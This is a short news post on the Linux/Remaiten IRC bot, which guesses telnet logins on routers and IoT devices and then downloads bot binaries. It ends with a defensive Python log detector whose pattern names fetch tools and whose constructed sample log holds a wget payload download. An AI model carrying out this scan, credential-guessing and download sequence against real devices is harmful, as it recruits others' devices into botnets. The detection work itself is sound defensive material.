Kaiten, an Internet Relay Chat (IRC)-controlled malware typically used to carry out distributed denial-of-service (DDoS) attacks, has returned, in a stronger configuration. It’s targeting routers and internet of things (IoT) devices.
ESET researchers have identified three tougher versions of the malware, which they dubbed Linux/Remaiten and characterize as “a Linux bot on steroids.” The main feature of the malware is an improved spreading mechanism.
“ESET researchers are actively monitoring malware that targets embedded systems such as routers, gateways and wireless access points,” the company explained in an analysis. “Recently, we discovered a bot that combines the capabilities of Tsunami (also known as Kaiten) and Gafgyt. It also provides some improvements as well as a couple of new features. We call this new threat Linux/Remaiten. So far, we have seen three versions of Linux/Remaiten that identify themselves as versions 2.0, 2.1 and 2.2. Based on artifacts found in the code, the authors call this new malware KTN-Remastered or KTN-RM.”
Based primarily on Linux/Gafgyt’s telnet scanning, the new versions improve on the spreading mechanism by carrying downloader executable binaries for embedded platforms such as routers and other connected devices.
When instructed to perform telnet scanning, the malware tries to connect to random public IP addresses. If the connection succeeds, it will try to guess the login credentials. If the malware successfully logs in, it will issue a shell command to download bot executable files for multiple system architectures and try to run them.
Full article: Kaiten Malware Returns to Threaten IoT
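The spreading sequence described above (repeated credential guesses over telnet, a successful login, then a command that fetches an executable) can be flagged from telnet honeypot or gateway logs. The following is an added example, not code from the original post or from ESET's analysis; the log layout, event names, threshold and list of fetch utilities are assumptions, and the log lines are constructed.

```python
import re
from collections import defaultdict

# Constructed honeypot log lines; the "time src EVENT detail" layout is an assumption.
SAMPLE_LOG = """\
2024-01-01T10:00:01 198.51.100.7 LOGIN_FAIL root
2024-01-01T10:00:02 198.51.100.7 LOGIN_FAIL admin
2024-01-01T10:00:03 198.51.100.7 LOGIN_FAIL support
2024-01-01T10:00:04 198.51.100.7 LOGIN_OK admin
2024-01-01T10:00:05 198.51.100.7 CMD wget http://192.0.2.10/sample.bin
2024-01-01T10:05:00 203.0.113.9 LOGIN_FAIL admin
2024-01-01T10:05:09 203.0.113.9 LOGIN_OK admin
2024-01-01T10:05:20 203.0.113.9 CMD uptime
2024-01-01T10:07:00 203.0.113.50 LOGIN_FAIL root
2024-01-01T10:07:01 203.0.113.50 LOGIN_FAIL guest
2024-01-01T10:07:02 203.0.113.50 LOGIN_FAIL user
"""

# Assumed set of fetch utilities found on embedded Linux; tune for your devices.
FETCH_RE = re.compile(r"\b(wget|tftp|curl|ftpget)\b")
LINE_RE = re.compile(r"^(\S+) (\S+) (LOGIN_FAIL|LOGIN_OK|CMD) (.*)$")

def classify_sessions(log_text, min_failures=3):
    """Return {source_ip: stage}, the furthest step seen per source:
    'guessing' -> 'guessed_login' -> 'download_after_guess'."""
    failures = defaultdict(int)
    stage = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines
        _, src, event, detail = m.groups()
        if event == "LOGIN_FAIL":
            failures[src] += 1
            if failures[src] >= min_failures and src not in stage:
                stage[src] = "guessing"
        elif event == "LOGIN_OK":
            if stage.get(src) == "guessing":
                stage[src] = "guessed_login"  # login followed a guessing run
            failures[src] = 0
        elif event == "CMD" and stage.get(src) == "guessed_login":
            if FETCH_RE.search(detail):
                stage[src] = "download_after_guess"
    return stage

if __name__ == "__main__":
    for src, st in classify_sessions(SAMPLE_LOG).items():
        print(src, st)
```

Sources that reach `download_after_guess` are the ones worth immediate triage; a single mistyped password followed by a normal login never enters the table.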